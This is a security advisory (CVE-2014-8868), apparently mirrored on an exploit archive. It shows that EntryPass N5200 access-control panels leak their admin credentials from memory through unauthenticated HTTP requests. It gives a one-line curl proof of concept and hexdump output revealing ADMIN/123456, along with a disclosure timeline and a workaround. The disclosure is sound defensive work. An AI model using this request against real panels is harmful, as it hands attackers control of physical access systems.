Skip to content
cyberexploits
webapphardwaretext

EntryPass N5200 - Credentials Exposure

EntryPass N5200 - Credentials Exposure

Publié le 2014-12-02

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/35442.txt7eac4c3a
raw
Advisory: EntryPass N5200 Credentials Disclosure



EntryPass N5200 Active Network Control Panels allow the unauthenticated

downloading of information that includes the current administrative

username and password.





Details

=======



Product: EntryPass N5200 Active Network Control Panel

Affected Versions: unknown

Fixed Versions: not available

Vulnerability Type: Information Disclosure, Credentials Disclosure

Security Risk: high

Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200

Vendor Status: notified

Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011

Advisory Status: published

CVE: CVE-2014-8868

CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868





Introduction

============



"EntryPass Active Networks are designed to enhance highly customized and

rapid 'real-time' changes to the underlying network operation.

Brilliantly engineered with all the power you need to enable

code-sending, minus unnecessary buffer time with its distributed

architecture capable of processing access demand at the edge level

without leveraging at the server end."



(From the vendor's home page)





More Details

============



EntryPass N5200 Active Network Control Panels offer an HTTP service on

TCP port 80. It appears that only the first character of a requested

URL's path is relevant to the web server. For example, requesting the

URL



http://example.com/1styles.css



yields the same CSS file as requesting the following URL:



http://example.com/1redteam



By enumerating all one-character long URLs on a device, it was

determined that URLs starting with a numeric character are used by the

web interface, as listed in the following table:



   http://example.com/0       Index

   http://example.com/1       Stylesheet

   http://example.com/2       Authentication with Username/Password

   http://example.com/3       Session Management

   http://example.com/4       Device Status

   http://example.com/5       Progressbar Image

   http://example.com/6       Reset Status

   http://example.com/7       Login Form

   http://example.com/8       HTTP 404 Error Page

   http://example.com/9       JavaScript



For URLs starting with non-numeric characters, an HTTP 404 - Not Found

error page is normally returned. Exceptions to this rule are URLs

starting with the lower case letters o to z and the upper case letters A

to D. When requesting these URLs, memory contents from the device appear

to be returned in the server's HTTP response.



As highlighted in the following listing, both the currently set username

ADMIN and the corresponding password 123456 are disclosed in the memory

contents when requesting the URL http://example.com/o:



$ curl -s http://example.com/o | hexdump -C | head

[...]

0010 XX XX XX XX XX XX XX XX  XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|

0020 6e 74 72 79 70 61 73 73  2e 6e 65 74 00 00 00 00 |ntrypass.net....|

[...]

0060 XX XX XX XX XX XX XX XX  XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|

0070 20 20 31 32 33 34 35 36  26 20 XX XX XX XX XX XX |  123456& XXXXXX|

[...]



These credentials grant access to the administrative web interface of

the device when using them in the regular login form.



Similarly, it is possible to get the status output of the device without

prior authentication by simply requesting the following URL



http://example.com/4



The server responds to the request with the following XML data, which

contains information about various different settings of the device.



<html>

<head>

<title>Device Server Manager</title>

</head>

<body>

<serial_no>XXXXXXXXXXXX-XXXX</serial_no>

<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>

<mac_address>XX-XX-XX-XX-XX-XX</mac_address>

<disable_reporting>disabled</disable_reporting>

<commit_setting>checked</commit_setting>

<user_id>ADMIN</user_id>

<user_pass>******</user_pass>

[...]

</body>

</html>





Proof of Concept

================



------------------------------------------------------------------------

$ curl -s http://example.com/o | hexdump -C | head

------------------------------------------------------------------------





Workaround

==========



Access to the web interface should be blocked at the network layer.





Fix

===



Not available.





Security Risk

=============



Attackers with network access to an EntryPass N5200 Active Network

Control Panel can retrieve memory contents from the device. These memory

contents disclose the currently set username and password needed to

access the administrative interface of the device. Using these

credentials, it is possible to read the device's current status and

configuration, as well as modify settings and install firmware updates.



With regards to the device itself, this vulnerability poses a high risk,

as it allows attackers to gain full control. The actual operational risk

depends on how the device is used in practice.





Timeline

========



2014-05-19 Vulnerability identified

2014-08-25 Customer approved disclosure to vendor

2014-08-27 Vendor contacted, security contact requested

2014-09-03 Vendor contacted, security contact requested

2014-09-15 Vendor contacted, vulnerability reported

2014-09-17 Update requested from vendor, no response

2014-10-15 No response from vendor. Customer discontinued use of the

           product and approved public disclosure

2014-10-20 Contacted vendor again since no fix or roadmap was provided.

2014-10-28 CVE number requested

2014-11-14 CVE number assigned

2014-12-01 Advisory released





RedTeam Pentesting GmbH

=======================



RedTeam Pentesting offers individual penetration tests, short pentests,

performed by a team of specialised IT-security experts. Hereby, security

weaknesses in company networks or products are uncovered and can be

fixed immediately.



As there are only few experts in this field, RedTeam Pentesting wants to

share its knowledge and enhance the public knowledge with research in

security-related areas. The results are made available as public

security advisories.



More information about RedTeam Pentesting can be found at

https://www.redteam-pentesting.de.





-- 

RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0

Dennewartstr. 25-27                       Fax : +49 241 510081-99

52068 Aachen                    https://www.redteam-pentesting.de

Germany                         Registergericht: Aachen HRB 14004

Geschäftsführer:                       Patrick Hof, Jens Liebchen
Voir sur GitHub